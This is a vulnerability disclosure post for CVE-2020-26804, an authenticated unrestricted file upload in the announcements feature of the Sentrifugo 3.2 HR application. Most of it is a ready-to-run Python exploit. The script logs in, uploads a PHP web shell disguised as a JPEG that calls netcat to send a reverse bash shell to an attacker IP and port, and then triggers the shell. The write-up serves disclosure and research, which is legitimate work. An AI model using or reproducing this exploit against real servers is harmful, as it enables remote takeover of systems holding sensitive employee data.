Sentrifugo 3.2 | RCE [Authenticated] (announcements) | CVE-2020-26804
Post
Cancel

# Sentrifugo 3.2 | RCE [Authenticated] (announcements) | CVE-2020-26804

Software: https://sourceforge.net/projects/sentrifugo/

Version: 3.2

CVE: CVE-2020-26804

Exploit-DB: https://www.exploit-db.com/exploits/48998

Sentrifugo is a FREE and powerful Human Resource Management System that can be easily configured to meet your organizational needs… Sentrifugo makes your organization’s HR process easier. It is packed with HR essential modules like Appraisal, Time Management, Leave Management, Employee Management, Analytics, Hiring/Recruitment, Background Check, Service Desk and much more.Sentrifugo furnishes a complete HRM solution facilitating a strategic and comprehensive approach to manage people and the workplace, thus enabling the employee(s) to contribute effectively and productively towards the organization’s goals. Sentrifugo is the only solution you’ll need for managing HR processes. It offers a host of adaptable features to meet the needs of both managers and employees.

Reference:  https://sourceforge.net/projects/sentrifugo/

### Vulnerability Description:

In Sentrifugo web application, users can share an announcement under “Organization -> Announcements” tab. Also, in this page, users can upload attachments with the shared announcements. This “Upload Attachment” functionality is suffered from “Unrestricted File Upload” vulnerability so attacker can upload malicious files using this functionality and control the server.

I wrote an exploit to demonstrate the vulnerability. You need to change hardcoded values before running the exploit.

## Exploit

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 import requests from bs4 import BeautifulSoup from ast import literal_eval ''' You should change the below hardcoded inputs to get a reverse shell. ''' login_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/index/loginpopupsave" upload_url = "http://XXX.XXX.XXX.XXX/sentrifugo/index.php/announcements/uploadsave" call_shell = "http://XXX.XXX.XXX.XXX/sentrifugo/public/uploads/ca_temp/" username = "xxx" password = "xxx" attacker_ip = "XXX.XXX.XXX.XXX" listener_port = "4444" # Set proxy for debugging purposes proxy = {"http": "http://XXX.XXX.XXX.XXX:8080"} # Log in to the system session = requests.Session() request = session.get(login_url) body = {"username":username,"password":password} # session.post(login_url, data=body, proxies=proxy) session.post(login_url, data=body) # Send a request without proxy print("Logged in to the application..") # Upload the PHP shell files = [ ('myfile', ('shell.php', '<?php system(\'nc.traditional {} {} -e /bin/bash\'); ?>'.format(attacker_ip,listener_port), 'image/jpeg') ) ] # r = session.post(upload_url, files=files, proxies=proxy) r = session.post(upload_url, files=files) # Send a request without proxy response = r.content dict_str = response.decode("UTF-8") response = literal_eval(dict_str) # Convert bytes to dictionary filename = response["filedata"]["new_name"] url = call_shell + filename print("PHP file is uploaded --> {}".format(url)) # Trigger the shell session.get(url)